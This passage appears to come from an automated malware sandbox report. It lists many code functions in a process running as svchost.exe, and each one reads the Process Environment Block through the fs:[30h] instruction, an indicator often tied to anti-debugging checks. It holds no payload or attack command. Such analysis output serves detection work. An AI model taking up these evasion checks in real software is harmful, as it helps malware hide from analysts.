Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03943A1C mov eax, dword ptr fs:[00000030h]	1_2_03943A1C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EAA16 mov eax, dword ptr fs:[00000030h]	1_2_039EAA16
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EAA16 mov eax, dword ptr fs:[00000030h]	1_2_039EAA16
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03938A0A mov eax, dword ptr fs:[00000030h]	1_2_03938A0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03964A2C mov eax, dword ptr fs:[00000030h]	1_2_03964A2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03964A2C mov eax, dword ptr fs:[00000030h]	1_2_03964A2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]	1_2_0394A229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EEA55 mov eax, dword ptr fs:[00000030h]	1_2_039EEA55
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B4257 mov eax, dword ptr fs:[00000030h]	1_2_039B4257
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]	1_2_03929240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]	1_2_03929240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]	1_2_03929240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]	1_2_03929240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396927A mov eax, dword ptr fs:[00000030h]	1_2_0396927A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DB260 mov eax, dword ptr fs:[00000030h]	1_2_039DB260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DB260 mov eax, dword ptr fs:[00000030h]	1_2_039DB260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F8A62 mov eax, dword ptr fs:[00000030h]	1_2_039F8A62
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952990 mov eax, dword ptr fs:[00000030h]	1_2_03952990
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A185 mov eax, dword ptr fs:[00000030h]	1_2_0395A185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394C182 mov eax, dword ptr fs:[00000030h]	1_2_0394C182
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]	1_2_039A51BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]	1_2_039A51BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]	1_2_039A51BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]	1_2_039A51BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039561A0 mov eax, dword ptr fs:[00000030h]	1_2_039561A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039561A0 mov eax, dword ptr fs:[00000030h]	1_2_039561A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]	1_2_039E49A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]	1_2_039E49A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]	1_2_039E49A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]	1_2_039E49A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A69A6 mov eax, dword ptr fs:[00000030h]	1_2_039A69A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0392B1E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0392B1E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0392B1E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B41E8 mov eax, dword ptr fs:[00000030h]	1_2_039B41E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]	1_2_03929100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]	1_2_03929100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]	1_2_03929100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395513A mov eax, dword ptr fs:[00000030h]	1_2_0395513A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395513A mov eax, dword ptr fs:[00000030h]	1_2_0395513A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]	1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]	1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]	1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]	1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03944120 mov ecx, dword ptr fs:[00000030h]	1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394B944 mov eax, dword ptr fs:[00000030h]	1_2_0394B944
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394B944 mov eax, dword ptr fs:[00000030h]	1_2_0394B944
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392B171 mov eax, dword ptr fs:[00000030h]	1_2_0392B171
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392B171 mov eax, dword ptr fs:[00000030h]	1_2_0392B171
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392C962 mov eax, dword ptr fs:[00000030h]	1_2_0392C962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03929080 mov eax, dword ptr fs:[00000030h]	1_2_03929080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A3884 mov eax, dword ptr fs:[00000030h]	1_2_039A3884
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A3884 mov eax, dword ptr fs:[00000030h]	1_2_039A3884
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395F0BF mov ecx, dword ptr fs:[00000030h]	1_2_0395F0BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395F0BF mov eax, dword ptr fs:[00000030h]	1_2_0395F0BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395F0BF mov eax, dword ptr fs:[00000030h]	1_2_0395F0BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]	1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]	1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]	1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]	1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]	1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]	1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039690AF mov eax, dword ptr fs:[00000030h]	1_2_039690AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]	1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BB8D0 mov ecx, dword ptr fs:[00000030h]	1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]	1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]	1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]	1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]	1_2_039BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]	1_2_039240E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]	1_2_039240E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]	1_2_039240E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039258EC mov eax, dword ptr fs:[00000030h]	1_2_039258EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F4015 mov eax, dword ptr fs:[00000030h]	1_2_039F4015
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F4015 mov eax, dword ptr fs:[00000030h]	1_2_039F4015
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]	1_2_039A7016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]	1_2_039A7016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]	1_2_039A7016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]	1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]	1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]	1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]	1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]	1_2_0395002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]	1_2_0393B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]	1_2_0393B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]	1_2_0393B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]	1_2_0393B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940050 mov eax, dword ptr fs:[00000030h]	1_2_03940050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940050 mov eax, dword ptr fs:[00000030h]	1_2_03940050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F1074 mov eax, dword ptr fs:[00000030h]	1_2_039F1074
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E2073 mov eax, dword ptr fs:[00000030h]	1_2_039E2073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03938794 mov eax, dword ptr fs:[00000030h]	1_2_03938794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]	1_2_039A7794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]	1_2_039A7794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]	1_2_039A7794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039637F5 mov eax, dword ptr fs:[00000030h]	1_2_039637F5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394F716 mov eax, dword ptr fs:[00000030h]	1_2_0394F716
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BFF10 mov eax, dword ptr fs:[00000030h]	1_2_039BFF10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BFF10 mov eax, dword ptr fs:[00000030h]	1_2_039BFF10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F070D mov eax, dword ptr fs:[00000030h]	1_2_039F070D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F070D mov eax, dword ptr fs:[00000030h]	1_2_039F070D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A70E mov eax, dword ptr fs:[00000030h]	1_2_0395A70E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A70E mov eax, dword ptr fs:[00000030h]	1_2_0395A70E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395E730 mov eax, dword ptr fs:[00000030h]	1_2_0395E730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03924F2E mov eax, dword ptr fs:[00000030h]	1_2_03924F2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03924F2E mov eax, dword ptr fs:[00000030h]	1_2_03924F2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393EF40 mov eax, dword ptr fs:[00000030h]	1_2_0393EF40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393FF60 mov eax, dword ptr fs:[00000030h]	1_2_0393FF60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F8F6A mov eax, dword ptr fs:[00000030h]	1_2_039F8F6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BFE87 mov eax, dword ptr fs:[00000030h]	1_2_039BFE87
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]	1_2_039F0EA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]	1_2_039F0EA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]	1_2_039F0EA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A46A7 mov eax, dword ptr fs:[00000030h]	1_2_039A46A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F8ED6 mov eax, dword ptr fs:[00000030h]	1_2_039F8ED6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03968EC7 mov eax, dword ptr fs:[00000030h]	1_2_03968EC7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039536CC mov eax, dword ptr fs:[00000030h]	1_2_039536CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DFEC0 mov eax, dword ptr fs:[00000030h]	1_2_039DFEC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039376E2 mov eax, dword ptr fs:[00000030h]	1_2_039376E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039516E0 mov ecx, dword ptr fs:[00000030h]	1_2_039516E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A61C mov eax, dword ptr fs:[00000030h]	1_2_0395A61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395A61C mov eax, dword ptr fs:[00000030h]	1_2_0395A61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]	1_2_0392C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]	1_2_0392C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]	1_2_0392C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03958E00 mov eax, dword ptr fs:[00000030h]	1_2_03958E00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1608 mov eax, dword ptr fs:[00000030h]	1_2_039E1608
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DFE3F mov eax, dword ptr fs:[00000030h]	1_2_039DFE3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392E620 mov eax, dword ptr fs:[00000030h]	1_2_0392E620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]	1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]	1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]	1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]	1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]	1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]	1_2_03937E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EAE44 mov eax, dword ptr fs:[00000030h]	1_2_039EAE44
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EAE44 mov eax, dword ptr fs:[00000030h]	1_2_039EAE44
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]	1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]	1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]	1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]	1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]	1_2_0394AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393766D mov eax, dword ptr fs:[00000030h]	1_2_0393766D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395FD9B mov eax, dword ptr fs:[00000030h]	1_2_0395FD9B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395FD9B mov eax, dword ptr fs:[00000030h]	1_2_0395FD9B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]	1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]	1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]	1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]	1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]	1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]	1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]	1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]	1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]	1_2_03922D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]	1_2_03951DB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]	1_2_03951DB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]	1_2_03951DB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F05AC mov eax, dword ptr fs:[00000030h]	1_2_039F05AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F05AC mov eax, dword ptr fs:[00000030h]	1_2_039F05AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039535A1 mov eax, dword ptr fs:[00000030h]	1_2_039535A1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]	1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]	1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]	1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6DC9 mov ecx, dword ptr fs:[00000030h]	1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]	1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]	1_2_039A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039D8DF1 mov eax, dword ptr fs:[00000030h]	1_2_039D8DF1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393D5E0 mov eax, dword ptr fs:[00000030h]	1_2_0393D5E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393D5E0 mov eax, dword ptr fs:[00000030h]	1_2_0393D5E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]	1_2_039EFDE2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]	1_2_039EFDE2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]	1_2_039EFDE2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]	1_2_039EFDE2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392AD30 mov eax, dword ptr fs:[00000030h]	1_2_0392AD30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]	1_2_03933D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EE539 mov eax, dword ptr fs:[00000030h]	1_2_039EE539
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F8D34 mov eax, dword ptr fs:[00000030h]	1_2_039F8D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AA537 mov eax, dword ptr fs:[00000030h]	1_2_039AA537
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]	1_2_03954D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]	1_2_03954D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]	1_2_03954D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03947D50 mov eax, dword ptr fs:[00000030h]	1_2_03947D50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03963D43 mov eax, dword ptr fs:[00000030h]	1_2_03963D43
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A3540 mov eax, dword ptr fs:[00000030h]	1_2_039A3540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039D3D40 mov eax, dword ptr fs:[00000030h]	1_2_039D3D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394C577 mov eax, dword ptr fs:[00000030h]	1_2_0394C577
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394C577 mov eax, dword ptr fs:[00000030h]	1_2_0394C577
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393849B mov eax, dword ptr fs:[00000030h]	1_2_0393849B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F8CD6 mov eax, dword ptr fs:[00000030h]	1_2_039F8CD6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E14FB mov eax, dword ptr fs:[00000030h]	1_2_039E14FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]	1_2_039A6CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]	1_2_039A6CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]	1_2_039A6CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]	1_2_039A6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]	1_2_039A6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]	1_2_039A6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]	1_2_039A6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]	1_2_039F740D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]	1_2_039F740D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]	1_2_039F740D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]	1_2_039E1C06
